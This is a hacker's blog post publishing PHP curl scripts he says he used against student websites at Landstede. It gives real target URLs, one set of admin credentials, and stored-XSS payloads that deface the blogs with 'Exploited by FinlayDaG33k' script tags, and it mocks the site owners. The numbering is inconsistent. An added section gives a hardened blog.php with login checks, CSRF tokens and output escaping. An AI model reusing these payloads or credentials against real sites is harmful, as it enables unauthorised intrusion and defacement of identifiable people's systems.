Exploit codes used against Landstede

Hey G33ks,

So, the storm has settled down between the skrubs from Landstede and me.
So I felt it was safe enough to release the exploit codes 🙂
There were a total of 3 exploits.
All the exploit codes below are 100% how I used them, all URLs, usernames, password etc. are 100% uncensored!
Please note that the exploits *should* have been patched (which gives them 0 reason to complain against me for publishing it) since it's about 3-4 months ago at the time of writing.
Well, here you go:


Exploit 1 – April 24 2017

Authentication is a luxury?

<?php
/*
 * Exploit by FinlayDaG33k
 * https://aberg.newdeveloper.nl/pages/blog.php 
 */

/*
 * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
 * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
 * As long as you retain this notice you can do whatever you want with this stuff. 
 * If we meet some day, you should buy me a drink.
 * Hugs are mandatory when meeting me!
 * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
 */

$message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec ($ch);

curl_close ($ch);
echo "Exploit send!";
?>

Exploit 2 – May 1 2017

Using username `admin` and password `test` is generally not a good idea on a website facing the whole world…

<?php
/*
 * Exploit by FinlayDaG33k
 * https://aberg.newdeveloper.nl/pages/blog.php 
 */

/*
 * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
 * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
 * As long as you retain this notice you can do whatever you want with this stuff. 
 * If we meet some day, you should buy me a drink.
 * Hugs are mandatory when meeting me!
 * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
 */

 /* Move this comment line to enable the script (the block comment runs until the closing "*/" before "?>" below, so the script is disabled as published)
$message = urlencode('<h1>Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

$cookiefile = DIRNAME(__FILE__) . '/cookies.txt';
$f = fopen($cookiefile, "w");
fclose($f);


$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/admin.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"user=admin&password=test");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '-');
curl_setopt($ch, CURLOPT_VERBOSE, true);
$http_headers = array(
                    'Host: aberg.newdeveloper.nl',
                    'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2',
                    'Accept: */*',
                    'Accept-Language: en-us,en;q=0.5',
                    'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
                    'Connection: keep-alive'
                  );
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $http_headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$result = curl_exec ($ch); // Authenticate ourselves!

$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header      = substr($result, 0, $header_size);


curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_exec ($ch);
curl_close ($ch);
*/?>
Exploit send!

Exploit 3 – May 4 2017

This guy trashtalked I wouldn't be able to exploit his site, well, it worked anyways (hint: he got pissed) 🙂

<?php
/*
 * Exploit by FinlayDaG33k
 * https://cschotman.newdeveloper.nl/pages/blog.php 
 */

/*
 * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
 * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
 * As long as you retain this notice you can do whatever you want with this stuff. 
 * If we meet some day, you should buy me a drink.
 * Hugs are mandatory when meeting me!
 * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
 */


$message = urlencode('This exploit is written on April the 24rd 2017 with ID "FDG-2017-00003".');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

$postdata = urlencode('send_post=HUEHUEHUE&new_title=Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a>&new_post='.$message);


$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,"https://cschotman.newdeveloper.nl/blog/new_post.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$postdata);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
curl_close ($ch);

print_r($result);
echo "Exploit send!";
?>

Exploit 5 – May 4 2017 (same as Exploit #1, but against a different target)

How was this one even possible?
I already exploited a site using the same mistake…
This one got them really mad btw :mrgreen:

<?php
/*
 * Exploit by FinlayDaG33k
 * https://pmetz.newdeveloper.nl/pages/blog.php 
 */

/*
 * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
 * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
 * As long as you retain this notice you can do whatever you want with this stuff. 
 * If we meet some day, you should buy me a drink.
 * Hugs are mandatory when meeting me!
 * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
 */

$message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
$message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,"https://pmetz.newdeveloper.nl/pages/blog.php ");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec ($ch);

curl_close ($ch);
echo "Exploit send!";
?>
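Exploits 1, 3 and 5 all rely on the same two mistakes: blog.php (or new_post.php) accepts a POST from anyone, and whatever is posted is echoed back as raw HTML. The handler below is an added example, not code from the original post or from any of the Landstede sites, showing what a blog.php that refuses both looks like. It assumes the login page sets `$_SESSION['user']` on success and that items live in a flat JSON file next to the script; both are assumptions for the demo.

```php
<?php
// Added example (not code from the original post or from the Landstede sites):
// a blog.php that closes the holes exploits 1, 3 and 5 rely on. Unauthenticated
// POSTs are refused, a per-session CSRF token is required, and stored items are
// escaped on output so a <script> payload is shown as text, not executed.
// Storage in a flat JSON file next to the script is an assumption for the demo.
session_start();
const ITEMS_FILE = __DIR__ . '/items.json';
function csrf_token(): string {
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}
function load_items(): array {
    return is_file(ITEMS_FILE) ? (json_decode(file_get_contents(ITEMS_FILE), true) ?: []) : [];
}
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (empty($_SESSION['user'])) {      // the original accepted "item" from anyone
        http_response_code(401);
        exit('Login required.');
    }
    if (!hash_equals(csrf_token(), (string)($_POST['csrf'] ?? ''))) {
        http_response_code(403);         // the POST must come from our own form
        exit('Bad CSRF token.');
    }
    $item = trim((string)($_POST['item'] ?? ''));
    if ($item === '' || strlen($item) > 2000) {
        http_response_code(400);
        exit('Item missing or too long.');
    }
    $items = load_items();
    $items[] = ['author' => $_SESSION['user'], 'body' => $item, 'at' => time()];
    file_put_contents(ITEMS_FILE, json_encode($items), LOCK_EX);
    header('Location: ' . $_SERVER['REQUEST_URI'], true, 303);
    exit;
}

header('Content-Type: text/html; charset=utf-8');
foreach (load_items() as $it) {          // escape at output: <script> becomes &lt;script&gt;
    printf("<p><b>%s</b>: %s</p>\n", esc($it['author']), esc($it['body']));
}
if (!empty($_SESSION['user'])) {         // only logged-in users get the form (and the token)
    printf('<form method="post"><input type="hidden" name="csrf" value="%s">'
         . '<textarea name="item"></textarea><button>Post</button></form>', esc(csrf_token()));
}
```

Against this handler the curl scripts above get a 401 (no session) before the payload is even looked at, and a payload posted by a real logged-in user is rendered as literal text rather than run by the browser.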

Well, there ya have it 🙂
If they dare to open their mouths against me again, then we can be sure that they don't give a damn about security.
But for now…

G33k Out!
